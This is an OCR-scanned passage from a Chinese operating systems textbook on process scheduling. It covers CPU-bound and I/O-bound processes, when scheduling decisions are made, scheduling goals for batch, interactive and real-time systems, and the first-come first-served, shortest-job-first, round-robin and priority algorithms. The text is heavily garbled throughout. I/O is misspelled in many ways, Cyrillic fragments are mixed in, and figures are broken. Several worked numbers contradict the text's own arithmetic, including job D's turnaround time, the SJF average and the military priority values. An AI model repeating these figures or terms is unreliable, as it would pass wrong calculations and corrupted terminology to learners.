度 算法 选 定 一 个 新 进程 ， 之 后 ， 应 该 将 新 进程 的 内 存 映像 重新 装 入 MMU， 最 后 新 进程 开始 运行 。 除 此 
之 外 ， 进 程 切 换 还 要 使 整个 内 存 高 速 缓存 失效 ， 强 迫 缓存 从 内 存 中 动态 重新 装 和 两 次 (进入 内 核 一 次 ， 
离开 内 核 一 次 )。 总 之 ， 如 果 每 秒 钟 切换 进程 的 次 数 太 多 ， 会 耗费 大 量 CPU 时 间 ， 所 以 有 必要 提醒 注意 。 

1. 进程 行为 

几乎 所 有 进程 的 (磁盘 ) LO 请 求 或 计算 都 是 交替 突 发 的 ， 如 图 2-38 所 示 。 典 型 地 ，CPU 不 停顿 地 
运行 一 段 时 间 ， 然 后 发 出 一 个 系统 调用 以 便 读 写 文件 。 在 完成 系统 调用 之 后 ，CPU 又 开始 计算 ， 直 到 它 
需要 读 更 多 的 数据 或 写 更 多 的 数据 为 止 。 请 注意 ， 某 些 L/O 活 动 可 以 看 作 是 计算 。 例 如 ， 当 CPU 向 视频 
RAM 复 制 数据 以 更 新 屏幕 时 ， 因 为 使 用 了 CPU， 所 以 这 是 计算 ， 而 不 是 LO 活动 。 按 照 这 种 观点 ， 当 一 
个 进程 等 待 外 部 设备 完成 工作 而 被 阻塞 时 ， 才 是 LO 活动 。 


а) С -一 二 c = { 


ма —= 


图 2-38 CPU 的 突 发 使 用 和 等 待 JO 的 时 期 交替 出 现 : a) CPU 密集 型 进程 b) 1/0 密 集 型 进程 


图 2-38 中 有 一 件 值得 注意 的 事 ， 即 某 些 进程 (图 2-38a 的 进程 ) 花费 了 绝 大 多 数 时 间 在 计算 上 ， 而 
其 他 进程 (图 2-38b 的 进程 ) 则 在 等 待 WO 上 花费 了 绝 大 多 数 时 间 。 前 者 称 为 计算 密集 型 (compute-bound) ， 
后 者 称 为 MO 密集 型 (UO-bound)。 典 型 的 计算 密集 型 进程 具有 较 长 时 间 的 CPU 集中 使 用 和 较 小 频 度 的 
IO 等 待 。UO 密 集 型 进程 具有 较 短 时 间 的 CPU 集中 使 用 和 频繁 的 MO 等 待 。 它 是 IO 类 的 ， 因 为 这 种 进程 
在 IO 请 求 之 间 较 少 进行 计算 ， 并 不 是 因为 它们 有 特别 长 的 UO 请 求 。 在 IO 开始 后 无 论处 理 数据 是 多 还 是 
少 ， 它 们 都 花费 同样 的 时 间 提出 硬件 请 求 读 取 磁 盘 块 。 

有 必要 指出 ， 随 着 CPU 变 得 越 来 越 快 ， 更 多 的 进程 倾向 为 O 密 集 型 。 这 种 现象 之 所 以 发 生 是 因为 
CPU 的 改进 比 磁盘 的 改进 快 得 多 ， 其 结果 是 ， 未 来 对 IO 密集 型 进程 的 调度 处 理 似乎 更 为 重要 。 这 里 的 
基本 思想 是 ， 如 果 需 要 运行 1O 密 集 型 进程 ， 那 么 就 应 该 让 它 尽 快 得 到 机 会 ， 以 便 发 出 磁盘 请 求 并 保持 
磁盘 始终 忙碌 。 从 图 2-6 中 可 以 看 到 ， 如 果 进程 是 1/O 窗 集 型 的 ， 则 需要 多 运行 一 些 这 类 进程 以 保持 CPU 
的 充分 利用 。 

2. 何 时 调度 

有 关 调 度 处 理 的 一 个 关键 问题 是 何 时 进行 调度 决策 。 存 在 着 需要 调度 处 理 的 各 种 情形 。 第 一 ， 在 创建 
一 个 新 进程 之 后 ， 需 要 决定 是 运行 父 进程 还 是 运行 子 进程 。 由 于 这 两 种 进程 都 处 于 就 绪 状 态 ， 所 以 这 是 一 
种 正常 的 调度 决策 ， 可 以 任意 决定 ， 也 就 是 说 ， 调 度 程序 可 以 合法 选择 先 运行 父 进程 还 是 先 运行 子 进程。 

第 二 ， 在 一 个 进程 退出 时 必须 做 出 调度 决策 。 一 个 进程 不 再 : (因为 它 不 再 存在 ) ， 所 以 必须 从 
就 绪 进程 集中 选择 另外 某 个 进程 。 如 果 没 有 就 绪 的 进程 ， 通 常会 运行 一 个 系统 提供 的 空闲 进 程 。 

第 三 ， 当 一 个 进程 阻塞 在 MO 和 信号 量 上 或 由 于 其 他 原因 阻塞 时 ， 必 须 选 择 另 一 个 进程 运行 。 有 时 ， 
阻塞 的 原因 会 成 为 选择 的 因素 。 例 如 ， 如 果 A 是 一 个 重要 的 进程 ， 并 正在 等 待 B 退 出 临界 区 ， 让 B 随 后 运 
行将 会 使 得 B 退 出 临界 区 ， 从 而 可 以 让 A 运 行 。 不 过 问题 是 ， 通 常 调 度 程序 并 不 拥有 做 出 这 种 相关 考虑 
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的 必要 信息 。 

第 四 ， 在 一 个 LO 中 断 发 生 时 ， 必 须 做 出 调度 决策 。 如 果 中 断 来 自 UO 设 备 ， 而 该 设备 现在 完成 了 工 
作 ， 某 些 被 阻塞 的 等 待 该 1O 的 进程 就 成 为 可 运行 的 就 绪 进程 了 。 是 否 让 新 就 绪 的 进程 运行 ， 这 取决 于 
调度 程序 的 决定 ， 或 者 让 中 断 发 生 时 运行 的 进程 继续 运行 ， 或 者 应 该 让 某 个 其 他 进程 运行 。 

如 果 硬 件 时 钟 提供 50Hz、60Hz 或 其 他 频率 的 周期 性 中 断 ， 可 以 在 每 个 时 钟 中 断 或 者 在 每 k 个 时 钟 中 
断 时 做 出 调度 决策 。 根 据 如 何 处 理 时 钟 中 断 ， 可 以 把 调度 算法 分 为 两 类 。 非 抢占 式 调度 算法 挑选 一 个 进 
程 ， 然 后 让 该 进程 运行 直至 被 阻塞 (阻塞 在 LO 上 或 等 待 另 一 个 进程 )， 或 者 直到 该 进程 自动 释放 CPU。 
即使 该 进程 运行 了 若干 个 小 时 ， 它 也 不 会 被 强迫 挂 起 。 这 样 做 的 结果 是 ， 在 时 钟 中 断 发 生 时 不 会 进行 调 
度 。 在 处 理 完 时 钟 中 断后 ， 如 果 没 有 更 高 优先 级 的 进程 等 待 到 时 ， 则 被 中 断 的 进程 会 继续 执行 。 

相反 ， 抢 占 式 调度 算法 挑选 一 个 进程 ， 并 且 让 该 进程 运行 革 个 固定 时 段 的 最 大 值 。 如 果 在 该 时 段 结 
东 时 ， 该 进程 仍 在 运行 ， 它 就 被 挂 起 ， 而 调度 程序 挑选 另 一 个 进程 运行 (如 果 存 在 一 个 就 绪 进 程 )。 进 
行 抢占 式 调 度 处 理 ， 需 要 在 时 间 间 隔 的 末端 发 生 时钟 中 断 ， 以 便 把 CPU 控制 返回 给 调度 程序 。 如 果 没 有 
可 用 的 时 钟 ， 那 么 非 抢 占 式 调度 就 是 惟一 的 选择 了 。 

3. 调度 算法 分 类 

毫 无 疑问 ， 不 同 的 环境 需要 不 同 的 调度 算法 。 之 所 以 出 现 这 种 情形 ， 是 因为 不 同 的 应 用 领域 (以 及 
不 同 的 操作 系统 ) 有 不 同 的 目标 。 换 句 话说 ， 在 不 同 的 系统 中 ， 调 度 程序 的 优化 是 不 同 的 。 这 里 有 必要 
划分 出 三 种 环境 : 

1) 批 处 理 。 

2) 交互 式 。 

3) 实时 。 

批 处 理 系 统 在 商业 领域 仍 在 广泛 应 用 ， 用 来 处 理 薪水 册 、 存 货 清单 、 账 目 收入 、 账 目 支 出 、 利 息 计算 (在 
银行 )、 索 赔 处 理 (在 保险 公司 ) 和 其 他 的 周期 性 的 作业 。 在 批 处 理 系统 中 ， 不 会 有 用 户 不 耐烦 地 在 终端 
旁 等 待 一 个 短 请 求 的 快捷 响应 。 因 此 ， 非 抢占 式 算法 ， 或 对 每 个 进程 都 有 长 时 间 周 期 的 抢占 式 算法 ， 通 常 
都 是 可 接受 的 。 这 种 处 理 方式 减少 了 进程 的 切换 从 而 改善 了 性 能 。 这 些 批 处 理 算法 实际 上 相当 普及 ， 并 经 
常 可 以 应 用 在 其 他 场合 ， 这 使 得 人 们 值得 去 学 习 它 们 ， 其 至 是 对 于 那些 没有 接触 过 大 型 机 计算 的 人 们 。 

在 交互 式 用 户 环境 中 ， 为 了 避免 一 个 进程 霸占 CPU 拒绝 为 其 他 进程 服务 ， 抢 占 是 必需 的 。 即 便 没 有 
进程 想 永 远 运行 ， 但 是 ， 某 个 进程 由 于 一 个 程序 错误 也 可 能 无 限期 地 排斥 所 有 其 他 进程 。 为 了 避免 这 种 
现象 发 生 ， 抢 占 也 是 必要 的 。 服 务 器 也 归于 此 类 ， 因 为 通常 它们 要 服务 多 个 突 发 的 〈 远 程 ) 用 户 。 

然而 在 有 实时 限制 的 系统 中 ， 抢 占有 时 是 不 需要 的 ， 因 为 进程 了 解 它 们 可 能 会 长 时 间 得 不 到 运行 ， 
所 以 通常 很 快 地 完成 各 自 的 工作 并 阻塞 。 实 时 系统 与 交互 式 系统 的 差别 是 ， 实 时 系统 只 运行 那些 用 来 推 
进 现 有 应 用 的 程序 ， 而 交互 式 系统 是 通用 的 ， 它 可 以 


运行 任意 的 非 协作 甚至 是 有 恶意 的 程序 。 所 有 系统 ай таны 
; Р 公 给 公平 的 CPU 
不 PETEN Н ш ан алгинин 
为 了 设计 调度 算法 ， 有 必要 考虑 什么 是 一 个 好 的 平衡 一 保持 系统 的 所 有 部 分 痢 忙 到 
调度 算法 。 某 些 目 标 取决 于 环境 ( 批 处 理 、 交 互 式 或 | 批 处 理 系统 
实时 )， 但 是 还 有 一 些 目标 是 适用 于 所 有 情形 的 。 在 图 大 吐 量 一 每 小 时 最 大 作业 数 
2-39 中 列 出 了 一 些 目标 ， 我 们 将 在 下 面 逐 一 讨论 。 周转 时 间 一 一 从 提交 到 终止 间 的 最 小 时 间 
在 所 有 的 情形 中 ， 公 平 是 很 重要 的 。 相 似 的 进程 CPU 利用 率 一 保持 CPU 始终 忙碌 


应 该 得 到 相似 的 服务 。 对 一 个 进程 给 予 较 其 他 等 价 的 。 | 交互 式 系统 
进程 更 多 的 CPU 时 间 是 不 公平 的 。 当 然 ， 不 同类 型 的 ee 
进程 可 以 采用 不 同方 式 处 理 。 可 以 考虑 一 下 在 核反应 
堆 计 算 机 中 心安 全 控制 与 发 放 薪水 处 理 之 间 的 差别 。 жалка 

与 公平 有 关 的 是 系统 策略 的 强制 执行 。 如 果 局 部 可 预测 性 -一 在 多 媒体 系统 中 避免 品质 降低 
策略 是 ， 只 要 需要 就 必须 运行 安全 控制 进程 (即便 这 
意味 着 推迟 30 秒 钟 发 薪 ) ， 那 么 调度 程序 就 必须 保证 。 图 2-39 在 不 同 环境 中 调度 算法 的 一 些 目标 
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能 够 强制 执行 该 策略 。 

另 一 个 共同 的 目标 是 保持 系统 的 所 有 部 分 尽 可 能 忙碌 。 如 果 CPU 和 所 有 LO 设备 能 够 始终 运行 ， 那 
么 相对 于 让 某 些 部 件 空转 而 言 ， 每 秒 钟 就 可 以 完成 更 多 的 工作 。 例 如 ， 在 批 处 理 系统 中 ， 调 度 程序 控制 
哪个 作业 调 入 内存 运 行 。 在 内 存 中 既 有 一 些 CPU 密集 型 进程 又 有 一 些 1O 密 集 型 进程 是 一 个 较 好 的 想法 ， 
好 于 先 调 人 和 运行 所 有 的 CPU 密集 型 作业 ， 然 后 在 它们 完成 之 后 再 调 入 和 运行 所 有 LO 密集 型 作业 的 做 
法 。 如 果 使 用 后 面 一 种 策略 ， 在 CPU 密 集 型 进程 运行 时 ， 它 们 就 要 竞争 CPU， 而 磁盘 却 te H, 
当 1/0 密 集 型 作业 来 了 之 后 ， 它 们 要 为 磁盘 而 竞争 ， 而 CPU 又 空转 了 。 显 然 ， 通 过 对 进程 的 仔细 组 合 ， 
可 以 保持 整个 系统 运行 得 更 好 一 些 。 

运行 大 量 批 处 理 作业 的 大 型 计算 中 心 的 管理 者 们 为 了 掌握 其 系统 的 工作 状态 ， 通 常 检查 三 个 指标 : 
吞吐 量 、 周 转 时间 以 及 CPU 利 用 率 。 知 吐 量 (throughout) 是 系统 每 小 时 完成 的 作业 数量 。 把 所 有 的 因 
素 考 虑 进去 之 后 ， 每 小 时 完成 50 个 作业 好 于 每 小 时 完成 40 个 作业 。 周 转 时 间 (turnaround time) 是 指 从 
一 个 批 处 理 作业 提交 时 刻 开始 直到 该 作业 完成 时 刻 为 止 的 统计 平均 时 间 。 该 数据 度量 了 用 户 要 得 到 输出 
所 需 的 平均 等 待 时 间 。 其 规则 是 : 小 就 是 好 的 。 

能 够 使 吞吐 量 最 大 化 的 调度 算法 不 一 定 就 有 最 小 的 周转 时 间 。 例 如 ， 对 于 确定 的 短 作业 和 长 作业 的 
一 个 组 合 ， 总 是 运行 短 作业 而 不 运行 长 作业 的 调度 程序 ， 可 能 会 获得 出 色 的 吞吐 性 能 (每 小 时 大 量 的 短 
作业 )， 但 是 其 代价 是 对 于 长 的 作业 周转 时 间 很 差 。 如 果 短 作业 以 一 个 稳定 的 速率 不 断 到达 ， 长 作业 可 
能 根本 运行 不 了 ， 这 样 平 均 周转 时 间 是 无 限 长 ， 但 是 得 到 了 高 的 吞吐 量 。 

CPU 利用 率 常 常用 于 对 批 处 理 系统 的 度量 。 尽 管 这 样 ，CPU 利 用 率 并 不 是 一 个 好 的 度量 参数 。 真 正 
有 价值 的 是 ， 系 统 每 小 时 可 完成 多 少 作业 (吞吐 量 ) ， 以 及 完成 作业 需要 多 长 时 间 (周转 时 间 )。 把 CPU 
利用 率 作为 度量 依据 ， 就 像 用 引擎 每 小 时 转动 了 多 少 次 来 比较 汽车 的 好 坏 一 样 。 另 一 方面 ， 知 道 什么 时 
息 CPU 利 用 率 接近 100% 比 知道 什么 时 候 要 求 得 到 更 多 的 计算 能 力 要 有 用 。 

对 于 交互 式 系统 ， 则 有 不 同 的 指标 。 最 重要 的 是 最 小 响应 时 间 ， 即 从 发 出 命令 到 得 到 响应 之 间 的 时 
间 。 在 有 后 台 进程 运行 (例如 ， 从 网 络 上 读 取 和 存储 电子 邮件 ) 的 个 人 计算 机 上 ， 用 户 请 求 启 动 一 个 程 
序 或 打开 一 个 文件 应 该 优先 于 后 台 的 工作 。 能 够 让 所 有 的 交互 式 请 求 首先 运行 的 则 是 好 服务 。 

-个 相关 的 问题 是 均衡 性 。 用 户 对 做 一 件 事情 需要 多 长 时 间 总 是 有 一 种 固有 的 (不 过 通常 不 正确 ) 
看 法 。 当 认为 一 个 请 求 很 复杂 需要 较 多 的 时 间 时 ， 用 户 会 接受 这 个 看 法 ， 但 是 当 认为 一 个 请 求 很 简单 ， 
但 也 需要 较 多 的 时 间 时 ， 用 户 就 会 急躁 。 例 如 ， 如 果 点 击 一 个 图 标 花费 了 60 秒 钟 发 送 完成 一 份 传真 ， 用 
户 大 概 会 接受 这 个 事实 ， 因 为 他 没有 期 望花 5 秒 钟 得 到 传真 。 

另 一 方面 ， 当 传真 发 送 完成 ， 用 户 点 击 断 开 电 话 连接 的 图 标 时 ， 该 用 户 就 有 不 一 样 的 期 待 了 。 如 果 
30 秒 之 后 还 没有 完成 断 开 操作 ， 用 户 就 可 能 会 抱怨 ， 而 60 秒 之 后 ， 他 就 要 气 得 要 命 了 。 之 所 以 有 这 种 行 
为 ， 其 原因 是 : 一 般 用 户 认为 拿 起 听 简 并 建立 通话 连接 所 需 的 时 间 要 比 挂 掉 电话 所 需 的 时 间 长 。 在 有 些 
情形 下 (如 本 例 )， 调 度 程序 对 响应 时 间 指 标 起 不 了 作用 但 是 在 另外 一 些 情形 下 ， 调 度 程序 还 是 能 够 
做 一 些 事 的 ， 特 别 是 在 出 现 差 的 进程 顺序 选择 时 。 

实时 系统 有 着 与 交互 式 系统 不 一 样 的 特性 ， 所 以 有 不 同 的 调度 目标 。 实 时 系统 的 特点 是 或 多 或 少 必 
须 满足 截止 时 间 。 例 如 ， 如 果 计 算 机 正在 控制 一 个 以 正常 速率 产生 数据 的 设备 ， 若 一 个 按时 运行 的 数据 
收集 进程 出 现 失败 ， 会 导致 数据 丢失 。 所 以 ， 实 时 系统 最 主要 的 要 求 是 满足 所 有 的 (或 大 多 数 ) 截止 时 
МЖ, 

在 多 数 实时 系统 中 ， 特 别 是 那些 涉及 多 媒体 的 实时 系统 中 ， 可 预测 性 是 很 重要 的 。 偶 尔 不 能 满足 截 
止 时 间 要 求 的 问题 并 不 严重 ,但 是 如 果 音 频 进程 运行 的 错误 太 多 ， 那 么 音质 就 会 下 降 得 很 快 。 视 频 品质 
也 是 一 个 问题 ,但 是 人 的 耳 打 比 眼睛 对 拌 动 要 敏感 得 多 。 为 了 避免 这 些 问题 ， 进 程 调度 程序 必须 是 高 度 
可 预测 和 有 规律 的 。 在 本 章 中 我 们 将 研究 批 处 理 和 交互 式 调度 算法 ， 而 把 有 关 实 时 调度 处 理 的 研究 放 到 
第 7 章 多 媒体 操作 系统 中 。 

242 批 处 理 系统 中 的 调度 
现在 我 们 从 一 般 的 调度 处 理 问题 转向 特定 的 调度 算法 。 在 这 一 节 中 ， 我 们 将 考察 在 批 处 理 系 统 中 使 
用 的 算法 ， 随 后 将 讨论 交互 式 和 实时 系统 中 的 调度 算法 。 有 必要 指出 ， 某 些 算法 既 可 以 用 在 批 处 理 系统 
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中 ， 也 可 以 用 在 交互 式 系统 中 。 我 们 将 稍 后 讨论 这 个 问题 。 

1. 先 来 先 服务 

在 所 有 调度 算法 中 ， 最 简单 的 是 非 抢占 式 的 先 来 先 服务 (first-come first-severd) 算法 。 使 用 该 算 
法 ， 进 程 按照 它们 请 求 CPU 的 顺序 使 用 CPU。 基 本 上 ， 有 一 个 就 绪 进程 的 单一 队列 。 早 上 ， 当 第 一 个 作 
业 从 外 部 进入 系统 ， 就 立即 开始 并 允许 运行 它 所 期 望 的 时 间 。 不 会 中 断 该 作业 ， 因 为 它 需要 很 长 的 时 间 
运行 。 当 其 他 作业 进入 时 ， 它 们 就 被 安排 到 队列 的 尾部 。 当 正在 运行 的 进程 被 阻塞 时 ， 队 列 中 的 第 一 个 
进程 就 接着 运行 。 在 被 阻塞 的 进程 变 为 就 结 时 ， 就 像 一 个 新 来 到 的 作业 一 样 ， 排 到 队列 的 末尾 。 

这 个 算法 的 主要 优点 是 易于 理解 并 且 便 于 在 程序 中 运用 。 就 难以 得 到 的 体育 或 音乐 会 票 的 分 配 问题 

言 ， 这 对 那些 愿意 在 早上 两 点 就 去 排队 的 人 们 也 是 公平 的 。 在 这 个 算法 中 ， 一 个 单 链表 记录 了 所 有 就 

绪 进程 。 要 选取 一 个 进程 运行 ， 只 要 从 该 队列 的 头 部 移 走 一 个 进程 即 可 ， 要 添加 一 个 新 的 作业 或 阻塞 一 
个 进程 ， 只 要 把 该 作业 或 进程 附加 在 相应 队列 的 末尾 即 可 。 还 有 比 这 更 简单 的 理解 和 实现 吗 ? 

不 过 ， 先 来 先 服务 也 有 明显 的 缺点 。 假 设 有 一 个 一 次 运行 1 秒 钟 的 计算 密集 型 进程 和 很 少 使 用 CPU 
但 是 每 个 都 要 进行 1000 次 磁盘 读 操作 才能 完成 的 大 量 UO 密 集 型 进程 存在 。 计 算 密集 进程 运行 ] 秒 钟 ， 接 
着 读 一 个 磁盘 块 。 所 有 的 IO 进程 开始 运行 并 读 磁盘 。 当 该 计算 密集 进程 获得 其 磁盘 块 时 ， 它 运行 下 一 
个 1 秒 钟 ， 紧 跟随 着 的 是 所 有 IO 进程 。 

这 样 做 的 结果 是 ， 每 个 1O 进 程 在 每 秒 钟 内 读 到 一 个 磁盘 块 ， 要 花费 1000 秒 钟 才能 完成 操作 。 如 果 
有 一 个 调度 算法 每 10ms 抢 占 计算 密集 型 进程 ， 那 么 1/O 进 程 将 在 10 秒 钟 内 完成 而 不 是 1000 秒 钟 ， 而 且 还 
不 会 对 计算 密集 型 进程 产生 多 少 延迟 。 

2. 最 短 作业 优先 

现在 来 看 一 种 适用 于 运行 时 间 可 以 预知 的 另 一 个 非 抢占 式 的 批 处 理 调度 算法 。 例 如 ， 一 家 保险 公司 ， 
因为 每 天 都 做 类 似 的 工作 ， 所 以 人 们 可 以 相当 精确 地 预测 处 理 1000 个 索赔 的 一 批 作业 需要 多 少时 间 。 当 
输入 队列 中 有 若干 个 同等 重要 的 作业 被 启动 时 ， 调 度 程序 应 使 用 最 组 作 业 优 先 shortest job first) 算法 ， 
请 看 图 2-40。 这 里 有 4 个 作业 A、B、C、D， 运 行 时 间 分 别 为 8、4、4、4 分 钟 。 若 按 图 中 的 次 序 运行 ， 则 
A 的 周转 时 间 为 8 分 钟 ，B 为 12 分 钟 ，C 为 16 分 钟 ，D 为 2 分钟， 平均 为 14 分 钟 。 


图 2-40 最 短 作业 优先 调度 的 例子 : а) 按 原 有 次 序 运行 4 个 作业 ，b) 按 最 短 作业 优先 次 序 运行 


现在 考虑 使 用 最 短 作业 优先 算法 运行 这 4 个 作业 ， 如 图 2-40b 所 示 。 目 前 周转 时 间 分 别 为 4、8、12 和 
20 分 钟 ， 平 均 为 1 分钟 。 可 以 证 明 最 短 作业 优先 是 最 优 的 。 考 虑 有 4 个 作业 的 情况 ， 其 运行 时 间 分 别 为 a、 
b、c、d。 第 一 个 作业 在 时 间 a 结 束 ， 第 二 个 在 时 间 a + b 结 束 ， 以 此 类 推 。 平 均 周转 时 间 为 (4a + 3b + 2c + 
d) /4。 显 然 a 对 平均 值 影响 最 大 ， 所 以 它 应 是 最 短 作业 ， 其 次 是 b， 再 次 是 ce， 最 后 的 d 只 影响 它 自 己 的 周 
转 时 间 。 对 任意 数目 作业 的 情况 ， 道 理 完全 一 样 。 

有 必要 指出 ， 只 有 在 所 有 的 作业 都 可 同时 运行 的 情形 下 ， 最 短 作业 优先 算法 才 是 最 优化 的 。 作 为 一 
个 反例 ， 考 虑 5 个 作业 ， 从 A 到 E， 运 行 时 间 分 别 是 2、4、1、1 和 1。 它 们 的 到 达 时 间 是 0、0、3、 3 和 3。 
开始 ， 只 能 选择 A 或 B， 因 为 其 他 三 个 作业 还 没有 到 达 。 使 用 最 短 作业 优先 ， 将 按照 A、B、C、 D、E 的 
顺序 运行 作业 ， 其 平均 等 待 时 间 是 4.6。 但 是 ， 按 照 B、C、D、E、A 的 顺序 运行 作业 ， 其 平均 等 待 时 间 
则 是 4.4。 

3. 最 短 剩余 时 间 优先 

最 短 作 业 优 先 的 抢占 式 版 本 是 最 短 币 余 时 间 优先 (shortest remaining time next) 算法 。 使 用 这 个 算 
法 ， 调 度 程序 总 是 选择 剩余 运行 时 间 最 短 的 那个 进程 运行 。 再 次 提醒 ， 有 关 的 运行 时 间 必 须 提前 掌握 。 
当 一 个 新 的 作业 到 达 时 ， 其 整个 时 间 同 当前 进程 的 剩余 时 间 做 比较 。 如 果 新 的 进程 比 当前 运行 进程 需要 
更 少 的 时 间 ， 当 前 进程 就 被 挂 起 ， 而 运行 新 的 进程 。 这 种 方式 可 以 使 新 的 短 作业 获得 良好 的 服务 。 
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243 交互 式 系统 中 的 调度 

现在 考察 用 于 交互 式 系统 中 的 一 些 调度 算法 ， 它 们 在 个 人 计算 机 、 服 务 器 和 其 他 类 系统 中 都 是 常用 的 。 

1. 轮转 调度 

一 种 最 古老 、 最 简单 、 最 公平 且 使 用 最 广 的 算法 是 轮转 调度 (round robin)。 每 个 进程 被 分 配 一 个 
时 间 段 ， 称 为 时 间 片 (quantum)， 即 允许 该 进程 在 该 时 间 段 中 运行 。 如 果 在 时 间 片 结束 时 该 进程 还 在 运 
行 ， 则 将 剥夺 CPU 并 分 配给 另 一 个 进程 。 如 果 该 进程 在 时 间 片 结束 前 阻塞 或 结束 ， 则 CPU 立即 进行 切换 。 
时 间 片 轮转 调度 很 容易 实现 ， 调 度 程序 所 要 做 的 就 是 维护 一 张 可 运行 进程 列表 ， 如 图 2-41a 所 示 。 当 一 
个 进程 用 完 它 的 时 间 片 后 ， 就 被 移 到 队列 的 末尾 ， 如 图 2-41b 所 示 。 

时 间 片 轮转 调度 中 惟一 有 趣 的 一 点 是 时 间 片 的 长 度 。 从 一 个 进程 切换 到 另 一 个 进程 是 需要 一 定时 间 
进行 管理 事务 处 理 的 一 一 保存 和 装 和 人 寄存 器 值 及 内 存 映像 、 更 新 各 种 表格 和 列表 、 清除 和 重新 调和 内存 
高 速 缓存 等 。 假 如 进程 切换 (process switch) ， 有 时 称 为 上 下 文 切换 (context switch) ， 需 要 lms， 包括 
切换 内 存 映像 、 清 除 和 重新 调 人 高 速 缓存 等 。 再 假设 时 间 片 设 为 4ms。 有 了 这 些 参数 ， 则 CPU 在 做 完 
4ms 有 用 的 工作 之 后 ，CPU 将 花费 ( 即 浪费 ) lms 来 进行 进程 切换 。 因 此 ， CPU 时 间 的 20% 浪 费 在 管理 开 
销 上 。 很 清楚 ， 这 一 管理 时 间 太 多 了 。 

下 一 个 
当前 进程 进程 当前 进程 


HÁTHA F =)515 
а) b) 


图 2-41 轮转 调度 : a) 可 运行 进程 列表 ，b) 进程 B 用 完 时 间 片 后 的 可 运行 进程 列表 


为 了 提高 CPU 的 效率 ， 我 们 可 以 将 时 间 片 设置 成 ， 比 方 说 ，100ms， 这 样 浪费 的 时 间 只 有 1%。 但 是 ， 
如 果 在 一 段 非常 短 的 时 间 间隔 内 到 达 50 个 请 求 ， 并 且 对 CPU 有 不 同 的 需求 ， 那 么 ， 考 虑 一 下 ， 在 一 个 服 
务 器 系统 中 会 发 生 什 么 呢 ? 50 个 进程 会 放 在 可 运行 进程 的 列表 中 。 如 果 CPU 是 空闲 的 ， 第 一 个 进程 会 立 
即 开始 执行 ， 第 二 个 直到 100ms 以 后 才 会 启动 ， 以 此 类 推 。 假 设 所 有 其 他 进程 都 用 足 了 它们 的 时 间 片 的 
话 ， 最 不 幸 的 是 最 后 一 个 进程 在 获得 运行 机 会 之 前 将 不 得 不 等 待 5 秒 钟 。 大 部 分 用 户 会 认为 5 秒 的 响应 对 
于 一 个 短命 令 来 说 是 缓慢 的 。 如 果 一 些 在 队列 后 端 附近 的 请 求 仅 要 求 几 翔 秒 的 CPU 时 间 ， 上 面 的 情况 会 
变 得 尤其 精 糕 。 如 果 使 用 较 短 的 时 间 片 的 话 ， 它 们 将 会 获得 更 好 的 服务 。 

另 一 个 因素 是 ， 如 果 时 间 片 设置 长 于 平均 的 CPU 突 发 时 间 ， 那 么 不 会 经 常 发 生 抢占 。 相反 ， 在 时 间 
片 耗费 完 之 前 多 数 进程 会 完成 一 个 阻塞 操作 ， 引 起 进程 的 切换 。 抢 占 的 消失 改善 了 性 能 ， 因为 进程 切换 
只 会 发 生 在 确实 逻辑 上 有 需要 的 时 候 ， 即 进程 被 阻塞 不 能 够 继续 运行 。 

可 以 归结 如 下 结论 ， 时间 片 设 得 太 短 会 导致 过 多 的 进程 切换 ， 降 低 了 CPU 效率 ， 而 设 得 太 长 又 可 能 
引起 对 短 的 交互 请 求 的 响应 时 间 变 长 。 将 时 间 片 设 为 20ms~50 ms 通常 是 一 个 比较 合理 的 折 中 。 

2. 优先 级 调度 

轮转 调度 做 了 一 个 隐 含 的 假设 ， 即 所 有 的 进程 同等 重要 ， 而 拥有 和 操作 多 用 户 计算 机 系统 的 人 对 此 
第 有 不 同 的 看 法 。 例 如 ， 在 一 所 大 学 里 ， 等 级 顺序 可 能 是 教务 长 首先 ， 然后 是 教授 、 秘 书 、 后 勤 人 员 ， 
最 后 是 学 生 。 这 种 将 外 部 因素 考虑 在 内 的 需要 就 导致 了 优先 级 调度 。 其 基本 思想 很 清楚 : 每 个 进程 被 赋 
予 一 个 优先 级 允许 优先 级 最 高 的 可 运行 进程 先 运行 。 

即使 在 只 有 一 个 用 户 的 PC 机 上 ， 也 会 有 多 个 进程 ， 其 中 一 些 比 另 一 些 更 重要 。 例如 ， 与 在 屏幕 上 
实时 显示 视频 电影 的 进程 相 比 ， 在 后 台 发 送 电子 邮件 的 守护 进程 应 该 被 赋予 较 低 的 优先 级 。 

为 了 防止 高 优先 级 进程 无 休止 地 运行 下 去 ， 调 度 程序 可 以 在 每 个 时 钟 滴答 ( 即 每 个 时 钟 中 断 ) 降低 
当前 进程 的 优先 级 。 如 果 这 个 动作 导致 该 进程 的 优先 级 低 于 次 高 优先 级 的 进程 ， 则 进行 进程 切换 。 ef 
可 采用 的 方法 是 ， 每 个 进程 可 以 被 赋予 一 个 允许 运行 的 最 大 时 间 片 ， 当 这 个 时 间 片 用 完 时 ， 下 一 个 次 高 
优先 级 的 进程 获得 机 会 运行 。 

优先 级 可 以 是 静态 赋予 或 动态 赋予。 在 一 台 军用 计算 机 上 ， 可 以 把 将 军 所 启动 的 进程 设 为 优先 级 
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100， 上 校 为 0， 少校 为 80， 上 尉 为 9， 中 尉 为 60， 以 此 类 推 。 或 者 ， 在 一 个 商业 计算 中 心 ， 高 优先 级 
作业 每 小 时 费用 为 100 美 元 ， 中 优先 级 每 小 时 75 美 元 ， 低 优先 级 每 小 时 50 美 元 。UNIX 系 统 中 有 一 条 命令 
mice， 它 允许 用 户 为 了 照顾 别人 而 自愿 降低 自己 进程 的 优先 级 。 但 从 未 有 人 用 过 它 。 

为 达到 某 种 目的 ， 优 先 级 也 可 以 由 系统 动态 确定 。 例 如 ， 有 些 进程 为 1O 密 集 型 ， 其 多 数 时 间 用 来 
等 待 O 结 束 。 当 这 样 的 进程 需要 CPU 时 ， 应 立即 分 配给 它 CPU， 以 便 启动 下 一 个 MO 请 求 ， 这 样 就 可 以 
在 另 一 个 进程 计算 的 同时 执行 1O 操 作 。 使 这 类 1/0 密 集 型 进程 长 时 间 等 待 CPU 只 会 造成 它 无 谓 地 长 时 间 
占用 内 存 。 使 /O 密 集 型 进程 获得 较 好 服务 的 一 种 简单 算法 是 ， 将 其 优先 级 设 为 1/f，/ 为 该 进程 在 上 一 时 
间 片 中 所 占 的 部 分 。 一 个 在 其 50ms 的 时 间 片 中 只 使 用 lms 的 进程 将 获得 优先 级 50， 而 在 阻塞 之 前 用 挤 
25ms 的 进程 将 具有 优先 级 2， 而 使 用 掉 全 部 时 间 片 的 进程 将 得 到 优先 级 1。 

